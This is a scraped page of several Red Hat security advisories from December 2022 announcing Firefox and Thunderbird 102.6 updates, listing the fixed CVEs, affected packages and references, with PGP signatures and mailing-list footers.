L6vUU05JB16V3Au2IVeFR5lUpX16wkYgcIuijhXJfyJoPuVSYX9PxOcEydtKdyIw  
tZcCkn4aBaXP0af2heB6XbtHNVaPdzkVqZyvwUo1lMp2cheQpinalwD6002pUMB+  
i1eq4qP90rssf0EQqJ/e+W0yUlThzD4RCpK2RI1DsxM8/F7J7YLi40iH9smN3Sm8  
TLsYNfMldiuK1OTWKE8Chr/hJL6dlUvgGMH5/X+HqnFpHWztcDSoo4yZgRF3tJt+  
nua339DDTn8=kb0x  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9070-01

Red Hat Security Advisory 2022-9066-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9066-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9066  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
firefox-102.6.0-1.el9_0.src.rpm

aarch64:  
firefox-102.6.0-1.el9_0.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el9_0.aarch64.rpm  
firefox-debugsource-102.6.0-1.el9_0.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el9_0.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el9_0.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el9_0.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el9_0.s390x.rpm  
firefox-debuginfo-102.6.0-1.el9_0.s390x.rpm  
firefox-debugsource-102.6.0-1.el9_0.s390x.rpm

x86_64:  
firefox-102.6.0-1.el9_0.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el9_0.x86_64.rpm  
firefox-debugsource-102.6.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ug99zjgjWX9erEAQgEEhAAhJIHK1wjYGsYxmu5ZFkC0bBjQilJLpxJ  
t2udAbzqkPlRaycOzb0oL9mTRtDXICYBelKNA1vIr3WBbN5lrqC5oBSgUV7HQFG2  
HsXna0DkfkDyYGoCfrHYhnAzIqhVALBp5jfLYnGwpCNbSzoCvAs1AIa9x6GD8QE7  
fqSIg9s0ymOFZUsmHofAZz/P16QHg501kVKSNJB87E42gE5zwBO3umaZiRqjcc/f  
nIU2P/F/9kPxlTog54L1+secHf+I806KDYZc1GFpdJgqEgq9zexxU7bLbFqnXQ3c  
kFCGkyd4fCygW0PS320pzzYOW52T9TOPSLZ8xp9aXyrvWJcIuADPEd7zJcgChBEb  
kDBeaVtGB913ON/5boRt3maalvHLA95SlPq7eSih3VkbH8vUFrHE0Ayx2dQnbviM  
f6oO7Al+NFtKGzzHR05L4upOFG0j+CfNUxfBrBOCaw+aN2U01ziBZl0xpB8bh/j2  
uDfrkrwSENkGPmHyUcBwO7FdLXA6n4tJzJMa875Nl6MWLpM4I/zARCbMjUNnQtGo  
0xXw5FyR/6LNgK1yL4YSspD13BlAt9SQCjFhdqwp+5SwVqW2P19hUUGrq4RSkPB/  
YkH8WJHsT12gPVYhdtNd/yYDpnLtn+B35ct7EtIXkULDh6SUaSklGz+DhJkI8SgZ  
jl/TlPdWPKE=OzET  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9066-01

Red Hat Security Advisory 2022-9074-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.6.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:9074-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9074  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-45414 CVE-2022-46872 CVE-2022-46874  
                   CVE-2022-46878 CVE-2022-46880 CVE-2022-46881  
                   CVE-2022-46882  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.6.0.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Quoting from an HTML email with certain tags will trigger  
network requests and load remote content, regardless of a configuration to  
block remote content (CVE-2022-45414)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2149868 - CVE-2022-45414 Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content  
2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-102.6.0-2.el8_7.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_7.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_7.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_7.aarch64.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_7.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_7.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_7.ppc64le.rpm

s390x:  
thunderbird-102.6.0-2.el8_7.s390x.rpm  
thunderbird-debuginfo-102.6.0-2.el8_7.s390x.rpm  
thunderbird-debugsource-102.6.0-2.el8_7.s390x.rpm

x86_64:  
thunderbird-102.6.0-2.el8_7.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_7.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45414  
https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhJ9zjgjWX9erEAQgp7w/+K+Zmk5wU3zQDZWUEEIbtdYab8bJXDxKh  
WGfVItJ2rsis4F5EVgUxpsU5x3dv2zFHmeU+7dJJToX/NB40TXeg/ncI05kWuNIz  
GhM76INcVU7od6tl440x87JZw7uH7Ck3UstEU6sk3XZd6WqRWlRyci/dueKvZ+Up  
SBcNg34YzjlwdRPAZK8eG+S5jBP33VAL/emBriKzVp2gLEImpHDM9JNQs3OKj0s9  
mOpNvExMZuLbWNAO7P1DNhDTAQmnanTqmV7G9aNNyp1/BnRfrFl4/7Jkugp3tA2G  
9nwL3dwrl/Z8vly5rLbCJIbj0bxaKM3RwMkXcyx0jhze2QhfbFMaizMiJ3LFJVdg  
7K2i3v3yd9w5OdfJweSXXKTUrdZqlRRagS8RDuU+9rNo/ANkzTvP62gTT5AXzlpO  
0/c8pmr5Pf8hOSbrlVrJpEsz2dKxJQYTGzTfZd+d6HTm967sxc6Yks4RFBsHtMgk  
tx4QC0V3auNFgAb7IiFhS0l+KDvgJ+2EH8oTrcrb20pJVRRBUre3ItDwN7BefWDC  
udFJIMjTwssYXISpnB+ynVqXks0UP+s+krPj+iTDQ+89QeRpmz7EA++NE2FcOVyk  
1htp/S0JUNQ2IQlf7snB0KuQcCor+nKFHpwMOvFL3YzEBPdcUXEdR/jaOYGDWFTe  
LvL5uOVDdyc=aZwb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9074-01

Red Hat Security Advisory 2022-9071-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9071-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9071  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-102.6.0-1.el8_1.src.rpm

ppc64le:  
firefox-102.6.0-1.el8_1.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_1.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_1.ppc64le.rpm

x86_64:  
firefox-102.6.0-1.el8_1.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_1.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhHtzjgjWX9erEAQjFOA//bCHb3VrCnrVth/bYPBQIQPFtFDxMpo1j  
L+xg1IkE+PZT+Jt4XUkLQUCbgUsLMTnevoW7sGLhmnt725ajJWHt3jfsSb0orSaq  
nfiTD0dN372RpXTAeIRx6wwqjcOu5ca5jMGjmH3YynyORNKWp88OUcBkyNEC2BSm  
qJop6fIeXLqej4sGYtuy/jmmUqMUAOyrpBPYZP7nKOop14gT++uZOlg0o4fHF1jS  
shXc6hWK+gEuIWR06aaBArZrRrCFWTYbDh7gUXQrcQmV932ySCPJdrGNitG0dzQq  
Yk0QiH6qRCZdYI15IuWOGmjR1aHL6OJ4gXeYcLYF/2+YS042S/xgpzkYtN+7LokO  
eRk7UPQkBlAYfhIO9CbFpAM9m9hGjam/kMAQAjDgyyPCwUxQLQ9ge06bZS7qvnHM  
QDu1Rbzea0IhakSJX80iEzLNVr8CCcYHWhp3wnjOYsknQ0mMADaOQJF20j586biL  
3NWSXWf9Zu+uR9yTcn9an0l9zdSJrb4iRWYkkpJWYVBJ1NB06wXpckd9h9s37Jw+  
BcM4OONW+SnkOCoQwbU+5oKh59ZRTDw7lLu9NN3PO0PfCot6JprF6ASSUahpiX36  
d3LDcJ2jgiqkJ5U0qkGVczliZAL0lrTEOQCTfrLSPVP2DPel2VIODzRBo2mQgSlR  
YsDGuPuX5k0=AKSZ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox